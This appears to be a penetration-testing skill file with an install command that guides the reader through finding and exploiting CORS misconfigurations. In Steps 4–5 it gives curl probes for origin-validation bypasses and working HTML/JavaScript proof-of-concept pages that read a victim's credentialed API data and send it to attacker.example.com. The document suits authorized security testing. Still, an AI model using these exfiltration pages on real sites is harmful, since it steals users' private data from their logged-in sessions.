Anthropic-Cybersecurity-Skills testing-cors-misconfiguration

Identifying and exploiting Cross-Origin Resource Sharing misconfigurations that allow unauthorized cross-domain

install

source · Clone the upstream repo

git clone https://github.com/mukul975/Anthropic-Cybersecurity-Skills

Claude Code · Install into ~/.claude/skills/

T=$(mktemp -d) && git clone --depth=1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/testing-cors-misconfiguration" ~/.claude/skills/mukul975-anthropic-cybersecurity-skills-testing-cors-misconfiguration && rm -rf "$T"

manifest: skills/testing-cors-misconfiguration/SKILL.md

source content

Testing CORS Misconfiguration

When to Use

During authorized penetration tests when assessing API endpoints for cross-origin access controls
When testing single-page applications that make cross-origin API requests
For evaluating whether sensitive data can be exfiltrated from a victim's browser session
When assessing microservice architectures with multiple domains sharing data
During security audits of applications using CORS headers for cross-domain communication

Prerequisites

Authorization: Written penetration testing agreement for the target
Burp Suite Professional: For intercepting and modifying Origin headers
Browser with DevTools: For observing CORS behavior in real browser context
Attacker web server: For hosting CORS exploitation PoC pages
curl: For manual CORS header testing
Python HTTP server: For hosting exploit pages locally

Workflow

Step 1: Identify CORS Configuration on Target Endpoints

Check all API endpoints for CORS response headers.

# Test with a foreign Origin header
curl -s -I \
  -H "Origin: https://evil.example.com" \
  "https://api.target.example.com/api/user/profile"

# Check for CORS headers in response:
# Access-Control-Allow-Origin: https://evil.example.com  (BAD: reflects any origin)
# Access-Control-Allow-Origin: *  (BAD if with credentials)
# Access-Control-Allow-Credentials: true  (allows cookies)
# Access-Control-Allow-Methods: GET, POST, PUT, DELETE
# Access-Control-Allow-Headers: Authorization, Content-Type
# Access-Control-Expose-Headers: X-Custom-Header

# Test multiple endpoints
for endpoint in /api/user/profile /api/user/settings /api/transactions \
  /api/admin/users /api/account/balance; do
  echo "=== $endpoint ==="
  curl -s -I \
    -H "Origin: https://evil.example.com" \
    "https://api.target.example.com$endpoint" | \
    grep -i "access-control"
  echo
done

Step 2: Test Origin Reflection and Validation Bypass

Determine how the server validates the Origin header.

# Test 1: Arbitrary origin reflection
curl -s -I -H "Origin: https://evil.com" \
  "https://api.target.example.com/api/user/profile" | grep -i "access-control-allow-origin"

# Test 2: Null origin
curl -s -I -H "Origin: null" \
  "https://api.target.example.com/api/user/profile" | grep -i "access-control-allow-origin"

# Test 3: Subdomain matching bypass
curl -s -I -H "Origin: https://evil.target.example.com" \
  "https://api.target.example.com/api/user/profile" | grep -i "access-control-allow-origin"

# Test 4: Prefix/suffix matching bypass
curl -s -I -H "Origin: https://target.example.com.evil.com" \
  "https://api.target.example.com/api/user/profile" | grep -i "access-control-allow-origin"

curl -s -I -H "Origin: https://eviltarget.example.com" \
  "https://api.target.example.com/api/user/profile" | grep -i "access-control-allow-origin"

# Test 5: Protocol downgrade
curl -s -I -H "Origin: http://target.example.com" \
  "https://api.target.example.com/api/user/profile" | grep -i "access-control-allow-origin"

# Test 6: Special characters in origin
curl -s -I -H "Origin: https://target.example.com%60.evil.com" \
  "https://api.target.example.com/api/user/profile" | grep -i "access-control-allow-origin"

# Test 7: Wildcard with credentials check
curl -s -I -H "Origin: https://evil.com" \
  "https://api.target.example.com/api/public" | grep -iE "access-control-allow-(origin|credentials)"
# Wildcard (*) + credentials (true) is invalid per spec but some servers misconfigure

Step 3: Test Preflight Request Handling

Assess how the server handles OPTIONS preflight requests.

# Send preflight request
curl -s -I -X OPTIONS \
  -H "Origin: https://evil.example.com" \
  -H "Access-Control-Request-Method: PUT" \
  -H "Access-Control-Request-Headers: Authorization, Content-Type" \
  "https://api.target.example.com/api/user/profile"

# Check:
# Access-Control-Allow-Methods: should only list needed methods
# Access-Control-Allow-Headers: should only list needed headers
# Access-Control-Max-Age: preflight cache duration (long = risky)

# Test if dangerous methods are allowed
curl -s -I -X OPTIONS \
  -H "Origin: https://evil.example.com" \
  -H "Access-Control-Request-Method: DELETE" \
  "https://api.target.example.com/api/user/profile" | \
  grep -i "access-control-allow-methods"

# Test if preflight is cached too long
curl -s -I -X OPTIONS \
  -H "Origin: https://evil.example.com" \
  -H "Access-Control-Request-Method: GET" \
  "https://api.target.example.com/api/user/profile" | \
  grep -i "access-control-max-age"
# max-age > 86400 (1 day) allows prolonged abuse after policy change

Step 4: Craft CORS Exploitation Proof of Concept

Build an HTML page that exploits the CORS misconfiguration to steal data.

<!-- cors-exploit.html - Host on attacker server -->
<html>
<head><title>CORS PoC</title></head>
<body>
<h1>CORS Exploitation Proof of Concept</h1>
<div id="result"></div>
<script>
// Exploit: Read victim's profile data cross-origin
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
  if (xhr.readyState === 4) {
    // Data successfully stolen cross-origin
    document.getElementById('result').innerText = xhr.responseText;

    // Exfiltrate to attacker server
    var exfil = new XMLHttpRequest();
    exfil.open('POST', 'https://attacker.example.com/collect', true);
    exfil.setRequestHeader('Content-Type', 'application/json');
    exfil.send(xhr.responseText);
  }
};
xhr.open('GET', 'https://api.target.example.com/api/user/profile', true);
xhr.withCredentials = true;  // Include victim's cookies
xhr.send();
</script>
</body>
</html>

<!-- Exploit using fetch API -->
<script>
fetch('https://api.target.example.com/api/user/profile', {
  credentials: 'include'
})
.then(response => response.json())
.then(data => {
  // Steal sensitive data
  fetch('https://attacker.example.com/collect', {
    method: 'POST',
    body: JSON.stringify(data)
  });
  console.log('Stolen data:', data);
});
</script>

Step 5: Exploit Null Origin Vulnerability

Origin: null

is allowed, exploit via sandboxed iframes.

<!-- null-origin-exploit.html -->
<html>
<body>
<h1>Null Origin CORS Exploit</h1>
<!--
  Sandboxed iframe sends requests with Origin: null
  If server reflects Access-Control-Allow-Origin: null with credentials,
  data can be exfiltrated
-->
<iframe sandbox="allow-scripts allow-top-navigation allow-forms"
  srcdoc="
  <script>
    var xhr = new XMLHttpRequest();
    xhr.onload = function() {
      // Send stolen data to parent or attacker server
      fetch('https://attacker.example.com/collect', {
        method: 'POST',
        body: xhr.responseText
      });
    };
    xhr.open('GET', 'https://api.target.example.com/api/user/profile');
    xhr.withCredentials = true;
    xhr.send();
  </script>
"></iframe>
</body>
</html>

<!-- Alternative: data: URI for null origin -->
<!-- Open in browser: data:text/html,<script>...</script> -->

Step 6: Test for Internal Network Access via CORS

Check if CORS allows access from internal origins that could be leveraged via XSS.

# Test internal/development origins
INTERNAL_ORIGINS=(
  "http://localhost"
  "http://localhost:3000"
  "http://localhost:8080"
  "http://127.0.0.1"
  "http://192.168.1.1"
  "http://10.0.0.1"
  "https://staging.target.example.com"
  "https://dev.target.example.com"
  "https://test.target.example.com"
)

for origin in "${INTERNAL_ORIGINS[@]}"; do
  echo -n "$origin: "
  curl -s -I -H "Origin: $origin" \
    "https://api.target.example.com/api/user/profile" | \
    grep -i "access-control-allow-origin" | tr -d '\r'
  echo
done

# If internal origins are allowed and have XSS:
# 1. Find XSS on http://subdomain.target.example.com
# 2. Use XSS to make CORS request to api.target.example.com
# 3. Exfiltrate data via the XSS + CORS chain

Key Concepts

Concept	Description
Same-Origin Policy	Browser security model preventing scripts from one origin accessing data from another
CORS	Mechanism allowing servers to specify which origins can access their resources
Origin Reflection	Server mirrors the request Origin header in the ACAO response header (dangerous)
Null Origin	Special origin value from sandboxed iframes, data URIs, and redirects
Preflight Request	OPTIONS request sent before certain cross-origin requests to check permissions
Credentialed Requests	Cross-origin requests that include cookies, requiring explicit ACAO + ACAC headers
Wildcard CORS	`Access-Control-Allow-Origin: *` allows any origin but prohibits credentials

Tools & Systems

Tool	Purpose
Burp Suite Professional	Intercepting requests and modifying Origin headers
CORScanner	Automated CORS misconfiguration scanner ( `pip install corscanner` )
cors-scanner	Node.js-based CORS testing tool
Browser DevTools	Monitoring CORS errors and network requests in real browser context
Python http.server	Hosting CORS exploit PoC pages
OWASP ZAP	Automated CORS misconfiguration detection

Common Scenarios

Scenario 1: Full Origin Reflection

The API reflects any Origin header in

Access-Control-Allow-Origin

with

Access-Control-Allow-Credentials: true

. Any website can read authenticated API responses, stealing user data.

Scenario 2: Null Origin Allowed

The server allows

Origin: null

with credentials. Using a sandboxed iframe, an attacker page sends credentialed requests to the API and reads the response data.

Scenario 3: Subdomain Wildcard Trust

The CORS policy allows

*.target.example.com

. An attacker finds XSS on

forum.target.example.com

and uses it to make cross-origin requests to

api.target.example.com

, stealing user data through the trusted subdomain.

Scenario 4: Regex Bypass on Origin Validation

The server uses regex

target\.example\.com

to validate origins, but fails to anchor the regex.

attackertarget.example.com

matches and is allowed access.

Output Format

## CORS Misconfiguration Finding

**Vulnerability**: CORS Origin Reflection with Credentials
**Severity**: High (CVSS 8.1)
**Location**: All /api/* endpoints on api.target.example.com
**OWASP Category**: A01:2021 - Broken Access Control

### CORS Configuration Observed
| Header | Value |
|--------|-------|
| Access-Control-Allow-Origin | [Reflects request Origin] |
| Access-Control-Allow-Credentials | true |
| Access-Control-Allow-Methods | GET, POST, PUT, DELETE |
| Access-Control-Expose-Headers | X-Auth-Token |

### Origin Validation Results
| Origin Tested | Reflected | Credentials |
|---------------|-----------|-------------|
| https://evil.com | Yes | Yes |
| null | Yes | Yes |
| http://localhost | Yes | Yes |
| https://evil.target.example.com | Yes | Yes |

### Impact
- Any website can read authenticated API responses in victim's browser
- User profile data (email, phone, address) exfiltrable
- Session tokens exposed via X-Auth-Token header
- CSRF protection bypassed (attacker can read and submit anti-CSRF tokens)

### Recommendation
1. Implement a strict allowlist of trusted origins
2. Never reflect arbitrary Origin values in Access-Control-Allow-Origin
3. Do not allow Origin: null with credentials
4. Validate origins with exact string matching, not regex substring matching
5. Set Access-Control-Max-Age to a reasonable value (600 seconds)